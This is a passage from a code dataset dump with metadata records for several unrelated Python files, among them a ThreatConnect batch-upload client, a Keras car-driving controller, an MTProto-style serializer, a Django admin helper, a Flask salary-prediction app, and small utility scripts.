error_groups = batch_data.get('errorGroupCount', 0)\n error_indicators = batch_data.get('errorIndicatorCount', 0)\n if error_count > 0 or error_groups > 0 or error_indicators > 0:\n self.tcex.log.debug('retrieving batch errors')\n batch_data['errors'] = self.errors(batch_id)\n else:\n # can't process files if status is unknown (polling must be enabled)\n process_files = False\n\n if process_files:\n # submit file data after batch job is complete\n batch_data['uploadStatus'] = self.submit_files(halt_on_error)\n batch_data_array.append(batch_data)\n\n if self.debug:\n self.write_error_json(batch_data.get('errors'))\n\n return batch_data_array\n\n def write_error_json(self, errors: list):\n \"\"\"Write the errors to a JSON file for debuging purposes.\n\n Args:\n errors (list): A list of errors to write out.\n \"\"\"\n if not errors:\n errors = []\n timestamp = str(time.time()).replace('.', '')\n error_json_file = os.path.join(self.tcex.args.tc_temp_path, f'errors-{timestamp}.json')\n with open(error_json_file, 'w') as fh:\n json.dump(errors, fh, indent=2)\n\n def submit_create_and_upload(self, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\n\n Returns.\n dict: The Batch Status from the ThreatConnect API.\n \"\"\"\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n content = self.data\n if content.get('group') or content.get('indicator'):\n if self.debug:\n # special code for debugging App using batchV2.\n self.write_batch_json(content)\n\n # store the length of the batch data to use for poll interval calculations\n self.tcex.log.info(f\"Batch Group Size: {len(content.get('group')):,}.\")\n self.tcex.log.info(f\"Batch Indicator Size {len(content.get('indicator')):,}.\")\n\n try:\n files = (('config', json.dumps(self.settings)), ('content', json.dumps(content)))\n params = {'includeAdditional': 'true'}\n r = self.tcex.session.post('/v2/batch/createAndUpload', files=files, params=params)\n self.tcex.log.debug(f'Batch Status Code: {r.status_code}')\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n return r.json()\n except Exception as e:\n self.tcex.handle_error(10505, [e], halt_on_error)\n return {}\n\n def submit_data(self, batch_id: int, halt_on_error: Optional[bool] = True) -> dict:\n \"\"\"Submit Batch request to ThreatConnect API.\n\n Args:\n batch_id (int): The batch id of the current job.\n halt_on_error (Optional[bool] = True): If True the process should halt if any errors\n are encountered.\n\n Returns:\n dict: The response data\n \"\"\"\n\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n content = self.data\n # store the length of the batch data to use for poll interval calculations\n self._batch_data_count = len(content.get('group')) + len(content.get('indicator'))\n self.tcex.log.info(f'Batch Size: {self._batch_data_count:,}')\n if content.get('group') or content.get('indicator'):\n headers = {'Content-Type': 'application/octet-stream'}\n try:\n r = self.tcex.session.post(f'/v2/batch/{batch_id}', headers=headers, json=content)\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10525, [r.status_code, r.text], halt_on_error)\n return r.json()\n except Exception as e:\n self.tcex.handle_error(10520, [e], halt_on_error)\n return {}\n\n def submit_files(self, halt_on_error=True):\n \"\"\"Submit Files for Documents and Reports to ThreatConnect API.\n\n Critical Errors\n\n * There is insufficient document storage allocated to this account.\n\n Args:\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n dict: The upload status for each xid.\n \"\"\"\n # check global setting for override\n if self.halt_on_file_error is not None:\n halt_on_error = self.halt_on_file_error\n\n upload_status = []\n for xid, content_data in list(self._files.items()):\n del self._files[xid] # win or loose remove the entry\n status = True\n\n # used for debug/testing to prevent upload of previously uploaded file\n if self.debug and xid in self.saved_xids:\n self.tcex.log.debug(f'skipping previously saved file {xid}.')\n continue\n\n # process the file content\n content = content_data.get('fileContent')\n if callable(content):\n content = content_data.get('fileContent')(xid)\n if content is None:\n upload_status.append({'uploaded': False, 'xid': xid})\n self.tcex.log.warning(f'File content was null for xid {xid}.')\n continue\n api_branch = 'documents'\n if content_data.get('type') == 'Report':\n api_branch = 'reports'\n\n if self.debug and content_data.get('fileName'):\n # special code for debugging App using batchV2.\n fqfn = os.path.join(\n self.tcex.args.tc_temp_path,\n f'''{api_branch}--{xid}--{content_data.get('fileName').replace('/', ':')}''',\n )\n with open(fqfn, 'wb') as fh:\n fh.write(content)\n\n # Post File\n url = f'/v2/groups/{api_branch}/{xid}/upload'\n headers = {'Content-Type': 'application/octet-stream'}\n params = {'owner': self._owner, 'updateIfExists': 'true'}\n r = self.submit_file_content('POST', url, content, headers, params, halt_on_error)\n if r.status_code == 401:\n # use PUT method if file already exists\n self.tcex.log.info('Received 401 status code using POST. Trying PUT to update.')\n r = self.submit_file_content('PUT', url, content, headers, params, halt_on_error)\n self.tcex.log.debug(f\"{content_data.get('type')} Upload URL: {r.url}.\")\n if not r.ok:\n status = False\n self.tcex.handle_error(585, [r.status_code, r.text], halt_on_error)\n elif self.debug:\n self.saved_xids.append(xid)\n self.tcex.log.info(f'Status {r.status_code} for file upload with xid {xid}.')\n upload_status.append({'uploaded': status, 'xid': xid})\n return upload_status\n\n def submit_file_content(self, method, url, data, headers, params, halt_on_error=True):\n \"\"\"Submit File Content for Documents and Reports to ThreatConnect API.\n\n Args:\n method (str): The HTTP method for the request (POST, PUT).\n url (str): The URL for the request.\n data (str;bytes;file): The body (data) for the request.\n headers (dict): The headers for the request.\n params (dict): The query string parameters for the request.\n halt_on_error (bool, default:True): If True any exception will raise an error.\n\n Returns:\n requests.models.Response: The response from the request.\n \"\"\"\n r = None\n try:\n r = self.tcex.session.request(method, url, data=data, headers=headers, params=params)\n except Exception as e:\n self.tcex.handle_error(580, [e], halt_on_error)\n return r\n\n def submit_job(self, halt_on_error=True):\n \"\"\"Submit Batch request to ThreatConnect API.\"\"\"\n # check global setting for override\n if self.halt_on_batch_error is not None:\n halt_on_error = self.halt_on_batch_error\n\n try:\n r = self.tcex.session.post('/v2/batch', json=self.settings)\n except Exception as e:\n self.tcex.handle_error(10505, [e], halt_on_error)\n\n if not r.ok or 'application/json' not in r.headers.get('content-type', ''):\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n data = r.json()\n if data.get('status') != 'Success':\n self.tcex.handle_error(10510, [r.status_code, r.text], halt_on_error)\n self.tcex.log.debug(f'Batch Submit Data: {data}')\n return data.get('data', {}).get('batchId')\n\n def threat(self, name, **kwargs):\n \"\"\"Add Threat data to Batch object\n\n Args:\n name (str): The name for this Group.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n xid (str, kwargs): The external id for this Group.\n\n Returns:\n obj: An instance of Threat.\n \"\"\"\n group_obj = Threat(name, **kwargs)\n return self._group(group_obj)\n\n def user_agent(self, text, **kwargs):\n \"\"\"Add User Agent data to Batch object\n\n Args:\n text (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of UserAgent.\n \"\"\"\n indicator_obj = UserAgent(text, **kwargs)\n return self._indicator(indicator_obj)\n\n def url(self, text, **kwargs):\n \"\"\"Add URL Address data to Batch object.\n\n Args:\n text (str): The value for this Indicator.\n confidence (str, kwargs): The threat confidence for this Indicator.\n date_added (str, kwargs): The date timestamp the Indicator was created.\n last_modified (str, kwargs): The date timestamp the Indicator was last modified.\n rating (str, kwargs): The threat rating for this Indicator.\n xid (str, kwargs): The external id for this Indicator.\n\n Returns:\n obj: An instance of URL.\n \"\"\"\n indicator_obj = URL(text, **kwargs)\n return self._indicator(indicator_obj)\n\n def write_batch_json(self, content):\n \"\"\"Write batch json data to a file.\"\"\"\n if content:\n timestamp = str(time.time()).replace('.', '')\n batch_json_file = os.path.join(self.tcex.args.tc_temp_path, f'batch-{timestamp}.json')\n with open(batch_json_file, 'w') as fh:\n json.dump(content, fh, indent=2)\n\n @property\n def file_len(self):\n \"\"\"Return the number of current indicators.\"\"\"\n return len(self._files)\n\n @property\n def group_len(self):\n \"\"\"Return the number of current groups.\"\"\"\n return len(self.groups) + len(self.groups_shelf)\n\n @property\n def indicator_len(self):\n \"\"\"Return the number of current indicators.\"\"\"\n return len(self.indicators) + len(self.indicators_shelf)\n\n def __len__(self):\n \"\"\"Return the number of groups and indicators.\"\"\"\n return self.group_len + self.indicator_len\n\n def __str__(self): # pragma: no cover\n \"\"\"Return string represtentation of object.\"\"\"\n groups = []\n for group_data in self.groups.values():\n if isinstance(group_data, dict):\n groups.append(group_data)\n else:\n groups.append(group_data.data)\n for group_data in self.groups_shelf.values():\n if isinstance(group_data, dict):\n groups.append(group_data)\n else:\n groups.append(group_data.data)\n\n indicators = []\n for indicator_data in self.indicators.values():\n if isinstance(indicator_data, dict):\n indicators.append(indicator_data)\n else:\n indicators.append(indicator_data.data)\n for indicator_data in self.indicators_shelf.values():\n if isinstance(indicator_data, dict):\n indicators.append(indicator_data)\n else:\n indicators.append(indicator_data.data)\n\n data = {'group': groups, 'indicators': indicators}\n return json.dumps(data, indent=4, sort_keys=True)\n","sub_path":"tcex/batch/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":68429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418201559","text":"\"\"\"\r\n Robot: F1\r\n Framework: keras\r\n Number of networks: 2\r\n Network type: Regression\r\n Predicionts:\r\n linear speed(v)\r\n angular speed(w)\r\n\r\n This brain uses regression networks based on Keras framework to predict the linear and angular velocity\r\n of the F1 car. For that task it uses two different regression convolutional neural networks, one for v\r\n and another one for w\r\n\"\"\"\r\nfrom behaviorlib.keraslib.keras_predict import KerasPredictor\r\nimport cv2\r\nfrom utils.constants import PRETRAINED_MODELS_DIR, ROOT_PATH\r\n\r\nPRETRAINED_MODELS = ROOT_PATH + '/' + PRETRAINED_MODELS_DIR + '/'\r\n\r\n\r\nclass Brain:\r\n \"\"\"Specific brain for the f1 robot. See header.\"\"\"\r\n\r\n def __init__(self, sensors, actuators, handler=None):\r\n \"\"\"Constructor of the class.\r\n\r\n Arguments:\r\n sensors {robot.sensors.Sensors} -- Sensors instance of the robot\r\n actuators {robot.actuators.Actuators} -- Actuators instance of the robot\r\n\r\n Keyword Arguments:\r\n handler {brains.brain_handler.Brains} -- Handler of the current brain. Communication with the controller\r\n (default: {None})\r\n \"\"\"\r\n self.motors = actuators.get_motor('motors_0')\r\n self.camera = sensors.get_camera('camera_0')\r\n self.handler = handler\r\n self.cont = 0\r\n self.net_v = KerasPredictor(PRETRAINED_MODELS + 'model_pilotnet_v.h5')\r\n self.net_w = KerasPredictor(PRETRAINED_MODELS + 'model_pilotnet_w.h5')\r\n\r\n def update_frame(self, frame_id, data):\r\n \"\"\"Update the information to be shown in one of the GUI's frames.\r\n\r\n Arguments:\r\n frame_id {str} -- Id of the frame that will represent the data\r\n data {*} -- Data to be shown in the frame. Depending on the type of frame (rgbimage, laser, pose3d, etc)\r\n \"\"\"\r\n self.handler.update_frame(frame_id, data)\r\n\r\n def execute(self):\r\n \"\"\"Main loop of the brain. This will be called iteratively each TIME_CYCLE (see pilot.py)\"\"\"\r\n\r\n if self.cont > 0:\r\n print(\"Runing...\")\r\n self.cont += 1\r\n\r\n image = self.camera.getImage().data\r\n img = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n\r\n prediction_v = self.net_v.predict(img, type='regression')\r\n prediction_w = self.net_w.predict(img, type='regression')\r\n\r\n if prediction_w != '' and prediction_w != '':\r\n self.motors.sendV(prediction_v)\r\n self.motors.sendW(prediction_w)\r\n\r\n self.update_frame('frame_0', image)\r\n","sub_path":"behavior_studio/brains/f1/brain_f1_keras_regression.py","file_name":"brain_f1_keras_regression.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327223321","text":"import argparse\nimport cPickle\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\n\ndef main():\n args = argparse.ArgumentParser()\n args.add_argument('--pkl', type=str, required=True)\n args.add_argument('--iter', type=int, default=5000)\n FLAGS = args.parse_args()\n\n with open(FLAGS.pkl, 'rb') as pkl:\n feats = cPickle.load(pkl)\n\n manifold = TSNE(n_iter=FLAGS.iter, init='pca', random_state=0)\n emb = manifold.fit_transform(feats)\n c = range(len(emb))\n\n sc = plt.scatter(emb[:, 0], emb[:, 1], c=c, cmap=plt.cm.get_cmap('RdYlBu'))\n plt.colorbar(sc)\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"tsne_vis.py","file_name":"tsne_vis.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32148284","text":"# -*- coding: utf8 -*-\r\nimport logging\r\nimport struct\r\n\r\ndef Int(size=32):\r\n assert(size % 8 == 0)\r\n size //= 8\r\n class int_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n return (int.from_bytes(data[offset:offset+size], 'little'), size)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return value.to_bytes(size, 'little')\r\n return int_cl\r\n\r\nclass Long(Int(64)):\r\n pass\r\n\r\nclass String:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n ln = int.from_bytes(data[offset:offset+1], 'little')\r\n if ln == 254:\r\n ln = int.from_bytes(data[offset+1:offset+4], 'little')\r\n return (data[offset+4:offset+4+ln], (((ln+4)-1)//4+1)*4)\r\n else:\r\n return (data[offset+1:offset+1+ln], (((ln+1)-1)//4+1)*4)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n if len(value) <= 253:\r\n return len(value).to_bytes(1, 'little') + value + b'\\0' * (3 - len(value) % 4)\r\n return b'\\xfe' + len(value).to_bytes(3, 'little') + value + b'\\0' * (3 - (len(value)+3) % 4)\r\n \r\ndef BigInt(size):\r\n assert(size % 8 == 0)\r\n size //= 8\r\n class big_int_cl(String):\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result, ln = super().Parse(data, offset)\r\n return (int.from_bytes(result, 'big'), ln)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return super().Dump(value.to_bytes(size, 'big'))\r\n \r\n return big_int_cl\r\n\r\nclass Double:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n return (struct.unpack_from('d', data, offset)[0], 8)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n return struct.pack('d', value)\r\n\r\ndef Tuple(*class_arg):\r\n class tuple_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result = []\r\n reslen = 0\r\n for t in class_arg:\r\n dt, ln = t.Parse(data, offset+reslen)\r\n result.append(dt)\r\n reslen += ln\r\n return (tuple(result), reslen)\r\n \r\n @classmethod\r\n def Dump(cls, *values):\r\n if len(values) == 1 and isinstance(values[0], tuple):\r\n return cls.Dump(*values[0])\r\n result = b''\r\n for arg, value in zip(class_arg, values):\r\n result += arg.Dump(value)\r\n return result\r\n \r\n return tuple_cl\r\n\r\ndef Vector(tipe):\r\n class vector_cl:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n result = []\r\n reslen = 0\r\n _, ln = Int().Parse(data, offset) # 0x1cb5c415\r\n reslen += ln\r\n count, ln = Int().Parse(data, offset+reslen)\r\n reslen += ln\r\n for _ in range(count):\r\n dt, ln = tipe.Parse(data, offset+reslen)\r\n result.append(dt)\r\n reslen += ln\r\n return (tuple(result), reslen)\r\n \r\n @classmethod\r\n def Dump(cls, value):\r\n result = b''\r\n for val in value:\r\n result += tipe.Dump(val)\r\n \r\n return vector_cl\r\n\r\nStructById = {}\r\nStructByName = {}\r\n\r\ndef Register(name, hash, *args):\r\n class struct_cl(Tuple(Int(), *args)):\r\n @classmethod\r\n def Name(cls):\r\n return name\r\n \r\n @classmethod\r\n def Hash(cls):\r\n return hash\r\n \r\n @classmethod\r\n def Create(cls, *args):\r\n # TODO: вставить проверку типов?\r\n return (hash,) + args\r\n\r\n StructById[hash] = struct_cl\r\n StructByName[name] = struct_cl\r\n globals()[name] = struct_cl\r\n\r\nclass Unknown:\r\n @classmethod\r\n def Parse(cls, data, offset=0):\r\n tipe, _ = Int().Parse(data, offset)\r\n return StructById[tipe].Parse(data, offset)\r\n \r\n @classmethod\r\n def Dump(cls, *values):\r\n if len(values) == 1 and isinstance(values[0], tuple):\r\n return cls.Dump(*values[0])\r\n return StructById[values[0]].Dump(*values)\r\n\r\nRegister('resPQ', 0x05162463, Int(128), Int(128), BigInt(64), Vector(Long))\r\nRegister('server_DH_params_fail', 0x79cb045d, Int(128), Int(128), Int(128)) \r\nRegister('server_DH_params_ok', 0xd0e8075c, Int(128), Int(128), String)\r\nRegister('server_DH_inner_data', 0xb5890dba, Int(128), Int(128), Int(), BigInt(2048), BigInt(2048), Int()) \r\nRegister('dh_gen_ok', 0x3bcbf734, Int(128), Int(128), Int(128))\r\nRegister('dh_gen_retry', 0x46dc1fb9, Int(128), Int(128), Int(128))\r\nRegister('dh_gen_fail', 0xa69dae02, Int(128), Int(128), Int(128))\r\nRegister('req_pq', 0x60469778, Int(128))\r\nRegister('p_q_inner_data', 0x83c95aec, BigInt(64), BigInt(32), BigInt(32), Int(128), Int(128), Int(256))\r\nRegister('req_DH_params', 0xd712e4be, Int(128), Int(128), BigInt(32), BigInt(32), Long, String)\r\nRegister('rsa_public_key', 0x7a19cb76, BigInt(2048), BigInt(32))\r\nRegister('set_client_DH_params', 0xf5045f1f, Int(128), Int(128), String)\r\nRegister('client_DH_inner_data', 0x6643b654, Int(128), Int(128), Long, BigInt(2048))\r\n\r\nif __name__ == \"__main__\":\r\n Register(\"test_struct\", 0x12345678, Int(), Int())\r\n\r\n test_cl = StructByName['test_struct']\r\n t = test_cl()\r\n data = Unknown.Dump(t.Create(123, 456))\r\n print(hex(int.from_bytes(data, 'big'))[2:].upper())\r\n x, ln = Unknown.Parse(data)\r\n print(x)\r\n \r\n","sub_path":"src/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"515337585","text":"import inspect\nimport sys\n\nimport django.db.models.fields.related_descriptors as related_descriptors\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.db.models.query_utils import DeferredAttribute\n\nfrom common.admin import CustomForm, CustomAdmin\n\n\ndef create_class(_name: str, _superclasses: tuple, _attributes: dict):\n _class = settings.CLASS_CACHE.get(_name)\n if _class is None:\n _class = type(_name, _superclasses, _attributes)\n settings.CLASS_CACHE[_name] = _class\n return _class\n\n\ndef get_cached_class(_name: str):\n return settings.CLASS_CACHE.get(_name)\n\n\ndef get_classes(_name):\n return [obj for name, obj in inspect.getmembers(sys.modules[_name], inspect.isclass)\n if obj.__module__ is _name]\n\n\ndef get_model_fields(_model):\n return tuple(field_name for field_name, _type in _model.__dict__.items() if\n type(_type) == DeferredAttribute and 'id' not in field_name)\n\n\nRELATED_FIELD_CLASS = get_classes(related_descriptors.__name__)\nRELATED_FIELD_MAX_RECURSION = 10\n\n\ndef lookup_related_field(model, model_name, related_fields, recursion_depth=0):\n recursion_depth += 1\n if recursion_depth > RELATED_FIELD_MAX_RECURSION:\n return\n for field_name, _type in model.__dict__.items():\n if type(_type) in RELATED_FIELD_CLASS:\n if '_set' not in field_name:\n field = model._meta.get_field(field_name)\n related_field_name = f\"{model_name}__{field_name}\"\n related_fields.add(related_field_name)\n related_model = field.related_model\n lookup_related_field(related_model, related_field_name, related_fields, recursion_depth)\n\n\ndef lookup_model_classes(name, model_classes):\n if model_classes is None:\n return None\n for model in model_classes:\n if model.__name__ == name:\n return model\n return None\n\n\ndef register_model_admin(model, model_classes=None, optimize_select_related=True):\n search_fields = []\n list_fields = []\n related_fields = set()\n\n for field_name, _type in model.__dict__.items():\n if type(_type) == DeferredAttribute:\n if 'id' not in field_name: search_fields.append(field_name)\n if optimize_select_related:\n if type(_type) in RELATED_FIELD_CLASS:\n if '_set' not in field_name:\n list_fields.append(field_name)\n field = model._meta.get_field(field_name)\n related_fields.add(field_name)\n related_model = field.related_model\n lookup_related_field(related_model, field_name, related_fields)\n\n _forms = CustomForm if optimize_select_related else forms.ModelForm\n display_fields = search_fields + list_fields\n model_admin_attributes = {'list_display': display_fields,\n 'list_filter': list_fields,\n 'list_select_related': tuple(related_fields),\n 'search_fields': search_fields,\n 'form': _forms,\n 'optimize_select_related': optimize_select_related\n }\n if optimize_select_related:\n model_admin_attributes['related_fields'] = related_fields\n\n try:\n inline_models = getattr(model, 'inlines')\n inlines = []\n for model_name in inline_models:\n inline_model = lookup_model_classes(model_name, model_classes)\n if inline_model:\n inline = create_class(f\"{inline_model.__name__}Inline\", (admin.TabularInline,),\n {'model': inline_model, 'forms': _forms})\n inlines.append(inline)\n model_admin_attributes['inlines'] = inlines\n except Exception:\n pass\n\n model_admin = type(f\"{model.__name__}Admin\", (CustomAdmin,), model_admin_attributes)\n admin.site.register(model, model_admin)\n","sub_path":"src/common/reflections.py","file_name":"reflections.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455095600","text":"import torch\r\nimport torch.nn as nn\r\n\r\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\r\nif device == 'cuda':\r\n torch.cuda.manual_seed_all(777)\r\n\r\nX = torch.FloatTensor([[0, 0],[0, 1], [1, 0] , [1 ,1]]).to(device)\r\nY = torch.FloatTensor([[0], [1], [1], [0]]).to(device)\r\n# 단층과 유사 그러나 모델 구현법에서 차이가난다.\r\nmodel = nn.Sequential(\r\n nn.Linear(2,8,bias=True),\r\n nn.Sigmoid(),\r\n nn.Linear(8, 8, bias=True),\r\n\r\n nn.Sigmoid(),\r\n nn.Linear(8 ,8 ,bias=True),\r\n\r\n nn.Sigmoid(),\r\n nn.Linear(8, 1, bias=True),\r\n nn.Sigmoid()).to(device)\r\n# 2개의 입력값과 8개의 은닉창이 2개를 구현한 후 1개의 출력층을 구현하는 모델을 구현\r\n\r\ncriterion = torch.nn.BCELoss().to(device)\r\noptimizer = torch.optim.SGD(model.parameters(), lr=1)\r\n# 단층과 유사\r\ntries = 10000\r\nfor i in range(tries + 1):\r\n optimizer.zero_grad()\r\n hypothesis = model(X)\r\n\r\n cost = criterion(hypothesis, Y)\r\n cost.backward()\r\n optimizer.step()\r\n\r\n if i % 100 == 0:\r\n print(i, cost.item())\r\n\r\nwith torch.no_grad():\r\n hypothesis = model(X)\r\n predicted = (hypothesis > 0.5).float()\r\n accuracy = (predicted == Y).float().mean()\r\n print('모델의 출력값(Hypothesis): ', hypothesis.detach().cpu().numpy())\r\n print('모델의 예측값(Predicted): ', predicted.detach().cpu().numpy())\r\n print('실제값(Y): ', Y.cpu().numpy())\r\n print('정확도(Accuracy): ', accuracy.item())","sub_path":"Perceptron/XorGate with morepereptron.py","file_name":"XorGate with morepereptron.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"408320068","text":"#!/usr/bin/python3\nimport json\n\"\"\"\nload_from_json module\n\"\"\"\n\n\ndef load_from_json_file(filename):\n \"\"\"\n Function that creates and object\n from a JSON file\n \"\"\"\n with open(filename) as f:\n nobj = json.load(f)\n return nobj\n","sub_path":"0x0B-python-input_output/8-load_from_json_file.py","file_name":"8-load_from_json_file.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"424239887","text":"from flask import Flask, render_template, request, url_for\nfrom bokeh.resources import INLINE\nfrom bokeh.util.string import encode_utf8\nimport pickle\nfrom os import path, getcwd\nfrom collections import defaultdict\nfrom sklearn.preprocessing import LabelEncoder\nimport pandas as pd\nimport xgboost as xgb\nimport numpy as np\n\napp = Flask(__name__)\n\n# Directories:\nMODELDIR = path.join(getcwd(), 'models')\n\n# Load lists of job titles, locations, and employers to populate the app's dropdown menus and make predictions:\nwith open(path.join(MODELDIR, 'locations-list.txt'), 'r') as f:\n locations = f.readlines()\n\nwith open(path.join(MODELDIR, 'job-titles-list.txt'), 'r') as f:\n job_titles = f.readlines()\n\nwith open(path.join(MODELDIR, 'employers-list.txt'), 'r') as f:\n employers = f.readlines()\n\n# TODO: change to Revelio's model (atm using model from TDI-final presentation)\nwith open(path.join(MODELDIR, 'TDI-XGB_model.pkl'), 'rb') as f:\n model = pickle.load(f)\n\n# These columns will change once I update the model to Revelio's model\nd = defaultdict(LabelEncoder)\ncols_transf = ['employer', 'job title', 'state', 'city']\n\nfor col in cols_transf:\n d[col] = LabelEncoder()\n d[col].classes_ = np.load(path.join(MODELDIR, '{}.npy'.format(col).replace(' ', '_')))\n\n\ndef encode_future_data(df, cols_to_transf):\n df_transf = df[cols_to_transf]\n df_non_transf = df.drop(cols_to_transf, axis=1)\n\n for k in d.keys():\n print(k)\n\n fit = df_transf.apply(lambda x: d[x.name].transform(x))\n\n df = pd.concat([fit, df_non_transf], axis=1, join='outer')\n return df\n\n\ndef process_request(predict_dict, cols_to_transf, future_data_column_order):\n predict_df = pd.DataFrame.from_dict(predict_dict)\n #predict_df_transf = predict_df[cols_to_transf]\n #predict_df_non_transf = predict_df.drop(cols_to_transf, axis=1)\n\n #for cols in predict_df_transf.columns:\n # predict_df_transf[col] = predict_df_transf[cols].str.upper()\n\n #predict_df = pd.concat([predict_df_transf, predict_df_non_transf], axis=1, join='outer')\n\n predict_df = encode_future_data(predict_df, cols_to_transf)\n\n predict_df = predict_df[future_data_column_order]\n return predict_df\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n # Static resources:\n return_str = ''\n js_resources = INLINE.render_js()\n css_resources = INLINE.render_css()\n\n if request.method == 'POST':\n job_title = request.form.get('job_title')\n location = request.form.get('location')\n employer = request.form.get('employer')\n\n city = location.split(',')[0].strip()\n state = location.split(',')[1].strip()\n\n # 'employer', 'job title', 'state', 'city', 'case status'\n\n predict_dict = {'employer': [employer], 'job title': [job_title], 'state': [state], 'city': [city],\n 'submit year': [2018]}\n\n cols_to_transf = ['employer', 'job title', 'state', 'city']\n future_data_column_order = ['employer', 'job title', 'state', 'city', 'submit year']\n\n predict_df = process_request(predict_dict, cols_to_transf, future_data_column_order)\n d_new_data = xgb.DMatrix(predict_df)\n new_predictions = model.predict(d_new_data)\n return_str = 'Your predicted salary as {} at {} in {}, {} is ${:,.0f}'.format(job_title, employer, city, state,\n int(np.expm1(new_predictions)))\n\n # Render results if available:\n html = render_template('index.html',\n js_resources=js_resources,\n css_resources=css_resources,\n return_str=return_str,\n companies=employers,\n locations=locations,\n job_titles=job_titles,\n )\n\n return encode_utf8(html)\n\n\nif __name__ == '__main__':\n app.run(debug=True, use_debugger=True, use_reloader=True, passthrough_errors=False, port=33507)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125841333","text":"from slackbot.bot import respond_to, listen_to\n\n\n@respond_to(r'^usage\\s*$')\n@listen_to(r'^usage\\s*$')\ndef usage(message):\n msg = \"使用法だよっ!!\\n\" \\\n \"*コマンド一覧*\\n\" \\\n \">タスク一覧:*task*\\n\" \\\n \">タスクを開く:*open [task_title]/[overview]/[task_level]/[date]*\\n\" \\\n \">タスクを閉じる:*close [task_title]*\\n\" \\\n \"*オプションの説明*\\n\" \\\n \">[task_title] - タスクタイトルを指定\\n\" \\\n \">[overview] - タスク内容を指定\\n\" \\\n \">[task_level] - low(低い):normal(普通):high(高い)の中から指定\\n\" \\\n \">[date] - mm:dd:yyyy-mm:dd:yyyy\\n\" \\\n \"*コマンド例* (タスクを開く)\\n\" \\\n \">open test/これはテストタスクです/high/04:01:2017-04:10:2017\"\n message.reply(msg)\n","sub_path":"plugins/usage.py","file_name":"usage.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246201068","text":"from typing import List\nclass Solution:\n def reversePairs(self, nums: List[int]) -> int:\n def mergesort(a, l, r):\n if r <= l:\n return 0\n mid = (l + r) >> 1\n count = mergesort(a, l, mid) + mergesort(a, mid+1, r)\n j = mid+1\n for i in range(l, mid+1):\n # while a[i] / 2.0 > a[j]:\n while j <= r and a[i]/2.0 > a[j]:\n j += 1\n count += j - (mid+1)\n a[l:r+1] = sorted(a[l:r+1])\n return count\n return mergesort(nums, 0, len(nums)-1)","sub_path":"Week_08/493_reversePairs.py","file_name":"493_reversePairs.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"611399956","text":"import math\n\nimport numpy as np\nimport pandas as pd\n# from pyfinance.ols import PandasRollingOLS\n\n\nfrom statsmodels.datasets import longley\n\n\nclass IndicatorMixin:\n\n def _check_fillna(self, serie: pd.Series, value: int = 0):\n \"\"\"Check if fillna flag is True.\n\n Args:\n serie(pandas.Series): dataset 'Close' column.\n value(int): value to fill gaps; if -1 fill values using 'backfill' mode.\n\n Returns:\n pandas.Series: New feature generated.\n \"\"\"\n if self._fillna:\n serie_output = serie.copy(deep=False)\n serie_output = serie_output.replace([np.inf, -np.inf], np.nan)\n if isinstance(value, int) and value == -1:\n return serie_output.fillna(method='ffill').fillna(value=-1)\n else:\n return serie_output.fillna(method='ffill').fillna(value)\n else:\n return serie\n\n def _true_range(self, high: pd.Series, low: pd.Series, prev_close: pd.Series):\n tr1 = high - low\n tr2 = (high - prev_close).abs()\n tr3 = (low - 